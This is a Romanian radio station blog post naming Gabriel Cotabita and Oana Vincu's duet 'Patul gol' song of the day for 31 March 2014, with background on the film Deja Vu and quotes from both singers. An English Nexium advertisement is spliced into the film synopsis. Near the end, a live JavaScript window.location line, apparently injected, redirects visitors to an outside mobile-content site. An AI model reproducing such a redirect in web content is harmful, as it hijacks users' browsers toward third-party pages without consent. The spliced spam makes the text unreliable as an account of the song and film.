Melodia zilei de 31 Martie 2014

Gabriel Cotabita si Oana Vincu – “Patul gol”

La cateva luni dupa ce a lansat piesa Patul Gol, aflata pe coloana sonora a filmului Deja Vu, Gabriel Cotabita si Oana Vincu vin si cu videoclipul.

Pe Oana o stim cu totii datorita trupei Genius, iar anul trecut ne-a surprins placut reintorcandu-se pe scena alaturi de Gabriel Cotabita. Solistul ne-a incantat alaturi de trupa VH2 cu piese ca Daca n-ai iubi, Trece vremea sau, cel mai recent, Schimba ceva.

Patul gol_digitalFa

Videoclipul contine scene din filmul Deja Vu, regizat de Dan Chisu si care a avut premiera in luna noiembrie a anului trecut. Déjà Vu’ este o poveste de 75 de minute, în timp real, despre fragilitatea relatiilor. Mihai, aflat la criza varstei de 55 de ani, doreste sa inceapa o noua viata si sa se regaseasca alaturi de femeia cu care avea o relație extraconjugala de 3 ani. Totul incepe in prima dimineata in care Mihai se trezeste acasa langa Tania, in locul sotiei sale. Momentul culminant este cel al intalnirii tragi-comice a celor trei, cand situatia scapa de sub control, avand insa efecte revelatoare. NexiumВ® 24HR: The Purple PillВ® you know and trust is now available without a prescription for frequent heartburn. buy Nexium 24HR today.

Videoclipul contine fragmente din povestea infatisata in film, despre o iubire sfaramata, ajunsa la final de poveste. Noutatea si, totodata, drama povestii decurg nu atat din tema trio-ului amoros, cat din tehnica de filmare: camera fixata pe o casca speciala il transforma pe principalul personaj si in cameraman si in regizor, el fiind singurul decident al actiunilor sale si al cadrelor pe care le surprinde. Spectatorul urmareste totul exclusiv prin ochii lui Mihai, fiind partai ai introspectiei sale.

Gabriel-Cotabita-si-Oana-Vincu---Patul-Gol-videoclip-nou-premiera

‘Am simtit ca trebuie sa ma reapuc de muzica. S-a terminat cu Genius in 1999 dupa care cochetam un pic cu muzica. Apoi am dat la facultate, in prezent predau canto la Scoala Populara de Arta din Timisoara. Intr-o dimineata, pur si simplu m-am trezut si am simtit ca trebuie sa ma reapuc de muzica’, a povestit Oana. Aceasta a continuat: “Colaborarea cu Gabi, nu putea sa decurga altfel, decat foarte bine. Pot spune ca ma simt onorata ca am avut sansa sa cant alaturi de el. Este un artist desavarsit si un om cu o experienta vasta, langa care nu te poti plictisi vreodata.”

“Cred ca fiecare dintre noi se poate regasi in acel text, intr-un moment al vietii, un moment in care credem ca ne este mai bine singuri. Nu vreau sa spun mai multe despre cantec, deoarece creierul face “traducerea” textului in functie de experientele de viata traite de fiecare dintre noi. Cuvantul cu care exprimam senzatia este acelasi, insa nu simtim aceste senzatii sau sentimente la aceeasi intensitate, intesitatea fiind data de experientele traite pana la acel moment.”

Despre colaborarea cu Oana, solistul VH2 ne-a marturisit: “O stiu pe Oana Vincu din perioada Genius. Nu am schimbat niciodata mai mult de cateva cuvinte sau gesturi de salut. Prima apropiere a fost una virtuala, datorita Facebook, am devenit prieteni si…atat. Prin aprilie 2013 am primit un telefon de la Sorin Bocerean, care reprezentase Genius si cu care mai colaborasem pe diverse planuri artistice, cu intrebarea daca as fi interesat sa fac un duet cu Oana. I-am cerut sa ascult piesa, dar nu i-am ascuns deschiderea neconditionata de a face acest duet, avand o deosebita apreciere fata de calitatile vocale ale acesteia.

oana-gabriel

Si astfel am primit un demo in engleza ‘Empty Walls’, insa pentru a avea un impact mai mare asupra publicului, am decis sa realizam piesa in limba romana. Am reusit sa finalizez textul, impreuna cu o poeta, care mai scrisese texte, dar cu care nu mai lucrasem, Ancuta Dionisie, decorul de la Moeciu de Sus fiind un catalizator inspirational extraordinar.

Momentul lansarii a coincis cu lansarea filmului ‘Deja Vu’ a lui Dan Chisu, un bun prieten de al meu, care avea nevoie de o melodie de impact pentru film, asa ca ‘Patul Gol’ i s-a parut alegerea potrivita.”

O melodie frumoasa semnata de Gabriel Cotabita si Oana Vincu – “Patul gol”, este aleasa melodia zilei de 31 Martie 2014 la Radio Enigma Romania.

O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

Haideti sa il ascultam si noi.


O zi frumoasa sa ai alaturi de cei dragi tie,
alaturi de Radio Enigma Romania -Vocea gandurilor tale.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *